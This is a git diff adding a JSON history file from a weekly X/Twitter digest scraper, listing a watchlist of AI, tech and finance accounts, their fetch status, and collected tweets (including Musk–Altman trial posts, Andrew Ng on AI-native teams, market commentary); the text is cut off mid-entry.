a/data/x_brief/history/20260427_170150.json b/data/x_brief/history/20260427_170150.json new file mode 100644 index 0000000..f724348 --- /dev/null +++ b/data/x_brief/history/20260427_170150.json @@ -0,0 +1,2991 @@ +{ + "generated_at": "2026-04-27T17:01:00.335819+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "karpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "liuliu", + "name": "刘进" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 259 + }, + "period": { + "days": 7, + "start_utc": "2026-04-20T17:00:26.134705+00:00", + "end_utc": "2026-04-27T17:01:00.335819+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 27, + "active_accounts": 21, + "total_tweets": 259, + "failed_accounts": 0, + "source_hits": { + "nitter": 26 + }, + "source_errors": {} + }, + "accounts": [ + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 11, + "error": "", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 6, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", + "url": "https://x.com/elonmusk/status/2048807976991850953", + "published_at": "2026-04-27T16:54:21+00:00", + "source": "nitter", + "title_zh": "‘骗子’Sam Altman这一称呼是否恰当?" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major report talked to over 100 people and saw secret papers. It says he has almost a sociopathic lack of concern for the truth. People who worked with him say he lies easily but still wants everyone to like him.\n\n• Top scientist Ilya made 70 pages of notes before the firing. They showed Sam was not honest with the team and board about safety rules.\n\n• He changed OpenAI from a nonprofit that Elon helped start to a for profit money making business. It was meant to be open for everyone with no personal gain.\n\n• He trained OpenAI on Twitter data without permission.\n\n• He keeps lying and shows a lack of transparency.\n\n• He poached xAI staff and took sensitive info illegally.\n\n• He dropped core safety promises to race for growth and money. Old team members say his big expensive AI projects around the world are too dangerous.\n\n• An ex OpenAI board member flat out called him a liar.\n\nThis is not just talk. It is what the people closest to him said and what the facts show. When the folks who worked with him say he cannot be trusted.", + "url": "https://x.com/elonmusk/status/2048804363595059425", + "published_at": "2026-04-27T16:39:59+00:00", + "source": "nitter", + "title_zh": "重大报告揭露Sam Altman信任危机" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Exactly", + "url": "https://x.com/elonmusk/status/2048802239272169582", + "published_at": "2026-04-27T16:31:33+00:00", + "source": "nitter", + "title_zh": "‘准确’背后的科技圈伦理争议升级" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. \n\nGreg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style. After this lawsuit, Scam will also be awarded tens of billions in stock directly. \n\nThe fundamental question is simply this: \n\nDo you want to set legal precedent in the United States that it is ok to loot a charity? If so, you undermine all charitable giving in the United States forever.\n\nI could have started OpenAI as a for-profit corporation. Instead, I started it, funded it, recruited critical talent and taught them everything I know about how to make a startup successful FOR THE PUBLIC GOOD.\n\nThen they stole the charity.", + "url": "https://x.com/elonmusk/status/2048801964457140540", + "published_at": "2026-04-27T16:30:27+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Scam Altman", + "url": "https://x.com/elonmusk/status/2048799712375902624", + "published_at": "2026-04-27T16:21:30+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", + "url": "https://x.com/charliebilello/status/2048799590044852390", + "published_at": "2026-04-27T16:21:01+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 \n\nFrom hill country ranches to Austin in ten minutes?! \n\nIf you could buy one for $2m, or lease for $5k a month, and commute into a city from the burbs?!? Wild. https://x.com/shaig/status/2048771337687101850/video/1", + "url": "https://x.com/jason/status/2048797572014207114", + "published_at": "2026-04-27T16:13:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "10 minutes from manhattan to jfk is a game changer… \n\n… but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! \n\nImagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 https://x.com/shaig/status/2048771337687101850/video/1", + "url": "https://x.com/jason/status/2048796982227972344", + "published_at": "2026-04-27T16:10:40+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱", + "url": "https://x.com/elonmusk/status/2048793511701717143", + "published_at": "2026-04-27T15:56:52+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: update! the @twistartups AI sidebar is going well\n\nThe goal: a live AI sidebar with 4 personas watching the pod in real time\n\nProgress update: \n✅ Side bar (Chrome extension works with any website)\n✅ Two characters: comedian fox + troll alien\n✅ Ability to adjust frequency / skip commentary\n\nit's honestly starting to feel pretty good\n\n\"they want to integrate a fact checker, which is just a polite way of saying their show needs a fact checker\"\n-fox 😂\n\n@Jason check it out 👇", + "url": "https://x.com/jason/status/2048793378511536538", + "published_at": "2026-04-27T15:56:20+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say “y’all shoulda known”.", + "url": "https://x.com/GaryMarcus/status/2048791912149295182", + "published_at": "2026-04-27T15:50:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.", + "url": "https://x.com/GaryMarcus/status/2048787646206677207", + "published_at": "2026-04-27T15:33:34+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "This is totally wrong.\n\nBlaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.", + "url": "https://x.com/GaryMarcus/status/2048787157536653627", + "published_at": "2026-04-27T15:31:37+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions.\n\n\"I truly believe, like in my soul, that he is trying to help humanity.\"\n\n\"He has these goals. Like back up the biosphere by making us a multi-planetary species or ushering in electric vehicles.\"\n\n\"These are incredibly important missions.\"\n\n\"Politics became probably the biggest threat as a bottleneck to achieving these very positive missions.\"\n\n\"I personally view the X acquisition as an attempt to help remove these bottlenecks. Through that lens, I think it's been incredibly successful.\"", + "url": "https://x.com/elonmusk/status/2048785882950549854", + "published_at": "2026-04-27T15:26:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If extremely violent criminals are not imprisoned, eventually they will murder innocent people", + "url": "https://x.com/elonmusk/status/2048783014075777369", + "published_at": "2026-04-27T15:15:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Best accounts for following Austin air quality? @grok", + "url": "https://x.com/jason/status/2048780089295302690", + "published_at": "2026-04-27T15:03:32+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Excellent point", + "url": "https://x.com/elonmusk/status/2048777628019032335", + "published_at": "2026-04-27T14:53:45+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", + "url": "https://x.com/GaryMarcus/status/2048771044987777428", + "published_at": "2026-04-27T14:27:36+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://x.com/HarryStebbings/status/2048764743205134644", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://x.com/HarryStebbings/status/2048764741435179442", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048761760971096534", + "published_at": "2026-04-27T13:50:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://x.com/JeffDean/status/2048759102390899142", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://x.com/GaryMarcus/status/2048757233174122827", + "published_at": "2026-04-27T13:32:43+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://x.com/HarryStebbings/status/2048756619622707452", + "published_at": "2026-04-27T13:30:16+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://x.com/soumithchintala/status/2048756358820827564", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://x.com/sama/status/2048755148361707946", + "published_at": "2026-04-27T13:24:26+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", + "url": "https://x.com/charliebilello/status/2048753179471323584", + "published_at": "2026-04-27T13:16:36+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://x.com/sama/status/2048751392031203544", + "published_at": "2026-04-27T13:09:30+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048751094671585397", + "published_at": "2026-04-27T13:08:19+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Wondering which month is the best time to start investing?\nThe right answer is any month. Just start!", + "url": "https://x.com/charliebilello/status/2048747238986305979", + "published_at": "2026-04-27T12:53:00+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Today marks the start of the Elon Musk v.Sam Altman trial.\n\nTwo opposing worldviews. \nSam Altman transformed a non-profit organization into one of the world's most profitable companies for his own enrichment.\n\n Elon Musk, who did everything he could to limit the development of AI and, faced with a wall of incomprehension, launched Grok to offer a solution that puts the search for truth at the heart of its search engine.\n\nThe trial is of paramount importance. Elon Musk has already stated that, in the event of a victory, any proceeds he receives will be donated to a charity.\n\nI don't know about you, but for the good of humanity, I hope Elon Musk wins.\nVerdict on May 12th", + "url": "https://x.com/elonmusk/status/2048746715805581608", + "published_at": "2026-04-27T12:50:55+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://x.com/GaryMarcus/status/2048746152749846549", + "published_at": "2026-04-27T12:48:41+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet.\n\n• Up to 3 Starlink antennas on each A380 for massive speed boost\n\n• Internet performance improved up to 1000x vs older systems\n\n• Enables streaming, gaming, video calls & real-time work onboard\n\n• Rollout begins in 2026 as part of fleet-wide upgrade\n\nA major leap in aviation connectivity 🚀", + "url": "https://x.com/elonmusk/status/2048744214230712500", + "published_at": "2026-04-27T12:40:59+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://x.com/GaryMarcus/status/2048742983684784239", + "published_at": "2026-04-27T12:36:05+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://x.com/GaryMarcus/status/2048739005525877072", + "published_at": "2026-04-27T12:20:17+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", + "url": "https://x.com/elonmusk/status/2048727747954868342", + "published_at": "2026-04-27T11:35:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted to remove him from state ballots. \n\nWhen all of that failed they tried to assassinate him not once but four times. \n\nAnd they go on national television to talk about how we need to vote for them to save democracy.", + "url": "https://x.com/elonmusk/status/2048720909809156378", + "published_at": "2026-04-27T11:08:22+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://x.com/paulg/status/2048704073356935676", + "published_at": "2026-04-27T10:01:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://x.com/paulg/status/2048701354672050286", + "published_at": "2026-04-27T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://x.com/paulg/status/2048677984106664227", + "published_at": "2026-04-27T08:17:48+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": 